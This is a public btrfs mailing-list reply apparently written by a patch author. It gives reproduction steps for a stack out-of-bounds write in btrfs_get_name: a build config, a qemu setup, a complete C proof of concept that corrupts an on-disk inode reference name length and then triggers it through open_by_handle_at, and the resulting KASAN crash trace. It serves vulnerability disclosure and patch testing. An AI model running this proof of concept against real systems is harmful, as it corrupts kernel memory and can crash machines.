From: Weiming Shi <bestswngs@gmail.com>
To: linux-btrfs@vger.kernel.org
Cc: dsterba@suse.com, josef@toxicpanda.com, clm@fb.com, xmei5@asu.edu
Subject: Re: [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths
Date: Wed, 10 Jun 2026 18:45:06 +0800 [thread overview]
Message-ID: <aik0hEV6ehKx6Ldv@Air.local> (raw)
In-Reply-To: <20260608083509.3907960-2-bestswngs@gmail.com>
Reproduction:
required kernel configuration
```
CONFIG_BTRFS_FS=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
ONFIG_KASAN_STACK=y
CONFIG_STACKPROTECTOR_STRONG=y
```
Steps to reproduce:
1. Create a btrfs filesystem
```
#!/bin/sh
set -e
OUT="${1:-base.img}"; SIZE="${2:-512M}"
rm -f "$OUT"; truncate -s "$SIZE" "$OUT"
mkfs.btrfs -f "$OUT" >/dev/null
echo "wrote clean btrfs image: $OUT ($SIZE)"
```
2. Then Run qemu with the image
```
qemu-system-x86_64 -enable-kvm -cpu host -m 4G -smp 2 -nographic -no-reboot \
-kernel kernel/test-bzImage-kasan \
-initrd env/initramfs-selfcontained.cpio.gz \
-drive file=/tmp/base.img,if=virtio,format=raw,snapshot=on \
-append "console=ttyS0 rdinit=/init nokaslr kasan.fault=panic"
```
3. run the PoC
```c
// Build: gcc -O2 -static -o poc poc_selfcontained.c
// Run : attach a freshly `mkfs.btrfs`-ed image as DEV (default /dev/vda)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/mman.h>
#ifndef DEV
#define DEV "/dev/vda"
#endif
#define MNT "/mnt"
#define HDR 0x65 // sizeof(struct btrfs_header)
#define ITEM 25 // sizeof(struct btrfs_item)
#define IREF 10 // sizeof(struct btrfs_inode_ref): u64 index + u16 name_len
#define SECTOR 4096
#define KEY_INODE_REF 12 // BTRFS_INODE_REF_KEY
#define TARGET_NAME_LEN 4096
static uint32_t crc32c(const uint8_t *p, size_t n)
{
uint32_t crc = ~0u;
for (size_t i = 0; i < n; i++) {
crc ^= p[i];
for (int k = 0; k < 8; k++)
crc = (crc >> 1) ^ (0x82F63B78u & (-(int32_t)(crc & 1)));
}
return ~crc;
}
static uint64_t rd64(const uint8_t *p){ uint64_t v; memcpy(&v,p,8); return v; }
static uint32_t rd32(const uint8_t *p){ uint32_t v; memcpy(&v,p,4); return v; }
static void wr32(uint8_t *p, uint32_t v){ memcpy(p,&v,4); }
static void wr16(uint8_t *p, uint16_t v){ memcpy(p,&v,2); }
struct fh { struct file_handle h; unsigned char buf[64]; };
// Rewrite d's INODE_REF item on the raw device (every DUP copy of the leaf).
static int patch_device(const char *dev, uint64_t d_ino, uint64_t sub_ino)
{
int fd = open(dev, O_RDWR);
if (fd < 0) { perror("open dev"); return -1; }
off_t sz = lseek(fd, 0, SEEK_END);
uint8_t *m = mmap(NULL, sz, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (m == MAP_FAILED) { perror("mmap"); close(fd); return -1; }
// superblock @ 64K: magic@+0x40, fsid@+0x20, nodesize@+0x94
const uint8_t *sb = m + 0x10000;
if (memcmp(sb + 0x40, "_BHRfS_M", 8)) { fprintf(stderr,"bad btrfs magic\n"); return -1; }
uint8_t fsid[16]; memcpy(fsid, sb + 0x20, 16);
uint32_t nodesize = rd32(sb + 0x94);
int patched = 0;
for (off_t off = 0; off + (off_t)nodesize <= sz; off += SECTOR) {
if (memcmp(m + off + 0x20, fsid, 16)) continue; // same filesystem
if (m[off + 0x64] != 0) continue; // leaf (level 0)
uint32_t nritems = rd32(m + off + 0x60);
if (!nritems || nritems > 2000) continue;
for (uint32_t i = 0; i < nritems; i++) {
off_t ip = off + HDR + (off_t)i * ITEM;
if (rd64(m+ip) != d_ino || m[ip+8] != KEY_INODE_REF ||
rd64(m+ip+9) != sub_ino)
continue;
uint32_t ioff = rd32(m+ip+17), isize = rd32(m+ip+21);
if (isize != IREF + 1) continue; // expect the "d" entry (len 1)
uint32_t new_size = IREF + TARGET_NAME_LEN; // 4106
uint32_t delta = new_size - isize; // 4095
// start of the packed data region = lowest item data offset
uint32_t data_end = nodesize;
for (uint32_t j = 0; j < nritems; j++) {
uint32_t o = rd32(m+off+HDR+(off_t)j*ITEM+17);
if (o < data_end) data_end = o;
}
if (delta > data_end - ITEM*nritems) { fprintf(stderr,"no room\n"); continue; }
// grow item i: shift the data of items at offset <= ioff down by delta
uint8_t *base = m + off + HDR;
memmove(base + data_end - delta, base + data_end,
(ioff + isize) - data_end);
for (uint32_t j = 0; j < nritems; j++) {
off_t jp = off + HDR + (off_t)j * ITEM;
uint32_t o = rd32(m+jp+17);
if (o <= ioff) wr32(m+jp+17, o - delta);
}
wr32(m + ip + 21, new_size); // item size 11 -> 4106
wr16(base + (ioff - delta) + 8, TARGET_NAME_LEN); // name_len 1 -> 4096
wr32(m + off, crc32c(m + off + 0x20, nodesize - 0x20)); // leaf csum
patched++;
break; // one matching item per leaf; keep scanning for DUP copies
}
}
msync(m, sz, MS_SYNC);
munmap(m, sz);
close(fd);
return patched;
}
int main(void)
{
struct fh fh; int mid; struct stat st;
uint64_t d_ino, sub_ino;
mkdir(MNT, 0755);
if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #1"); return 1; }
mkdir(MNT "/sub", 0755);
if (mkdir(MNT "/sub/d", 0755)) { perror("mkdir /sub/d"); return 1; }
stat(MNT "/sub", &st); sub_ino = st.st_ino;
stat(MNT "/sub/d", &st); d_ino = st.st_ino;
printf("[poc] created /sub/d (sub_ino=%lu d_ino=%lu)\n",
(unsigned long)sub_ino, (unsigned long)d_ino);
fh.h.handle_bytes = sizeof fh.buf;
if (name_to_handle_at(AT_FDCWD, MNT "/sub/d", &fh.h, &mid, 0)) {
perror("name_to_handle_at"); return 1;
}
printf("[poc] obtained file handle for /sub/d (%u bytes)\n", fh.h.handle_bytes);
sync();
umount(MNT);
int n = patch_device(DEV, d_ino, sub_ino);
printf("[poc] rewrote %d on-disk INODE_REF copy/ies: name_len 1 -> %d, "
"item 11 -> %d bytes\n", n, TARGET_NAME_LEN, IREF + TARGET_NAME_LEN);
if (n < 1) { fprintf(stderr, "[poc] nothing patched\n"); return 1; }
if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #2"); return 1; }
int mfd = open(MNT, O_RDONLY | O_DIRECTORY);
if (mfd < 0) { perror("open mnt"); return 1; }
puts("[poc] open_by_handle_at(/sub/d) -> reconnect_path -> btrfs_get_name "
"(expect stack-OOB on a vulnerable kernel)");
int r = open_by_handle_at(mfd, &fh.h, O_RDONLY | O_DIRECTORY);
if (r < 0)
printf("[poc] open_by_handle_at: %s -- no crash, kernel is PATCHED\n",
strerror(errno));
else
puts("[poc] open_by_handle_at succeeded (unexpected)");
return 0;
}
```
4. Observe the crash
```
[ 23.447577][ T178] BUG: KASAN: stack-out-of-bounds in read_extent_buffer+0x2b4/0x3c0
k-OOB on a vulne[ 23.447983][ T178] Write of size 633 at addr ffff88810a67fbc0 by task poc/178
rable kernel)
[ 23.448358][ T178]
[ 23.448523][ T178] CPU: 1 UID: 0 PID: 178 Comm: poc Tainted: G W 7.1.0-rc2+ #166 PREEMPT(lazy) 94e7405e6ff72f9547adbe151fef187ff71238a
[ 23.448527][ T178] Tainted: [W]=WARN
[ 23.448527][ T178] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 23.448529][ T178] Call Trace:
[ 23.448530][ T178] <TASK>
[ 23.448531][ T178] dump_stack_lvl+0x93/0x100
[ 23.448535][ T178] print_address_description.constprop.0+0x30/0x400
[ 23.448537][ T178] ? __virt_addr_valid+0x228/0x440
[ 23.448540][ T178] ? read_extent_buffer+0x2b4/0x3c0
[ 23.448542][ T178] print_report+0xc4/0x2c0
[ 23.448544][ T178] ? __virt_addr_valid+0x237/0x440
[ 23.448546][ T178] ? read_extent_buffer+0x2b4/0x3c0
[ 23.448548][ T178] kasan_report+0xf8/0x140
[ 23.448550][ T178] ? read_extent_buffer+0x2b4/0x3c0
[ 23.448553][ T178] kasan_check_range+0x119/0x200
[ 23.448555][ T178] __asan_memcpy+0x3c/0x80
[ 23.448558][ T178] read_extent_buffer+0x2b4/0x3c0
[ 23.448561][ T178] btrfs_get_name+0x333/0x600
[ 23.448564][ T178] ? __pfx_btrfs_get_name+0x40/0x40
[ 23.448566][ T178] ? __lock_acquire+0x4f9/0xc00
[ 23.448570][ T178] reconnect_one+0x17e/0x580
[ 23.448572][ T178] ? __pfx_reconnect_one+0x40/0x40
[ 23.448574][ T178] ? trace_preempt_enable+0xac/0x180
[ 23.448576][ T178] ? _raw_spin_unlock+0x2d/0x80
[ 23.448578][ T178] ? trace_preempt_on+0x2c/0x40
[ 23.448581][ T178] reconnect_path+0x20c/0x2c0
[ 23.448583][ T178] ? __pfx_vfs_dentry_acceptable+0x40/0x40
[ 23.448586][ T178] exportfs_decode_fh_raw+0x5a3/0x880
[ 23.448588][ T178] ? __pfx_exportfs_decode_fh_raw+0x40/0x40
[ 23.448594][ T178] ? __might_fault+0xad/0x140
[ 23.448596][ T178] ? __lock_release.isra.0+0x5d/0x180
[ 23.448598][ T178] ? __might_fault+0xad/0x140
[ 23.448601][ T178] handle_to_path+0x524/0x880
[ 23.448603][ T178] ? __pfx_handle_to_path+0x40/0x40
[ 23.448606][ T178] ? entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 23.448608][ T178] ? lockdep_hardirqs_on+0x7f/0x140
[ 23.448611][ T178] ? do_handle_open+0x7e/0x200
[ 23.448613][ T178] do_handle_open+0x7e/0x200
[ 23.448615][ T178] ? __pfx_do_handle_open+0x40/0x40
[ 23.448617][ T178] ? rcu_is_watching+0x15/0xc0
[ 23.448619][ T178] ? do_syscall_64+0x129/0xf00
[ 23.448621][ T178] ? trace_preempt_enable+0xac/0x180
[ 23.448623][ T178] do_syscall_64+0x17a/0xf00
[ 23.448625][ T178] ? do_syscall_64+0x129/0xf00
[ 23.448626][ T178] ? clear_bhb_loop+0x60/0xc0
[ 23.448628][ T178] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 23.448630][ T178] RIP: 0033:0x41bf74
[ 23.448632][ T178] Code: 89 02 48 c7 c0 ff ff ff ff eb b4 e8 e6 08 00 00 66 0f 1f 44 00 00 f3 0f 1e fa 80 3d ed 80 09 00 00 74 13 b8 30 01 00 00 0f 05 5
[ 23.448634][ T178] RSP: 002b:00007fffce51fac8 EFLAGS: 00000202 ORIG_RAX: 0000000000000130
[ 23.448636][ T178] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000000000041bf74
[ 23.448638][ T178] RDX: 0000000000010000 RSI: 00007fffce51fb30 RDI: 0000000000000003
[ 23.448639][ T178] RBP: 0000000000000003 R08: 0000000000000000 R09: 0000000000000000
[ 23.448640][ T178] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000102
[ 23.448641][ T178] R13: 0000000000000003 R14: 00007fffce51fb30 R15: 00007fffce51fc10
[ 23.448644][ T178] </TASK>
[ 23.448645][ T178]
[ 23.462123][ T178] The buggy address belongs to stack of task poc/178
[ 23.462403][ T178] and is located at offset 64 in frame:
[ 23.462639][ T178] exportfs_decode_fh_raw+0x0/0x880
[ 23.462860][ T178]
[ 23.462961][ T178] This frame has 2 objects:
[ 23.463159][ T178] [32, 48) 'path'
[ 23.463161][ T178] [64, 320) 'nbuf'
[ 23.463320][ T178]
[ 23.463582][ T178] The buggy address belongs to the physical page:
[ 23.463852][ T178] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a67f
[ 23.464228][ T178] flags: 0x17ffffc0000000(node=0|zone=2|lastcpupid=0x1fffff)
[ 23.464540][ T178] raw: 0017ffffc0000000 ffffea0004299fc8 ffffea0004299fc8 0000000000000000
[ 23.464899][ T178] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
[ 23.465263][ T178] page dumped because: kasan: bad access detected
[ 23.465532][ T178]
[ 23.465633][ T178] Memory state around the buggy address:
[ 23.465869][ T178] ffff88810a67fb80: f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 00 00 00 00
[ 23.466212][ T178] ffff88810a67fc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 23.466549][ T178] >ffff88810a67fc80: 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3
[ 23.466886][ T178] ^
[ 23.467152][ T178] ffff88810a67fd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 23.467489][ T178] ffff88810a67fd80: f1 f1 f1 f1 00 00 00 f2 f2 f2 f2 f2 00 f3 f3 f3
[ 23.467826][ T178] ==================================================================
[ 23.468184][ T178] Kernel panic - not syncing: kasan.fault=panic set ...
```
next prev parent reply other threads:[~2026-06-10 10:45 UTC|newest]
Thread overview: 4+ messages / expand[flat|nested] mbox.gz Atom feed top
2026-06-08 8:35 [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths Weiming Shi
2026-06-08 9:19 ` Qu Wenruo
2026-06-10 10:45 ` Weiming Shi [this message]
2026-06-10 11:26 ` Qu Wenruo
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=aik0hEV6ehKx6Ldv@Air.local \
--to=bestswngs@gmail.com \
--cc=clm@fb.com \
--cc=dsterba@suse.com \
--cc=josef@toxicpanda.com \
--cc=linux-btrfs@vger.kernel.org \
--cc=xmei5@asu.edu \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox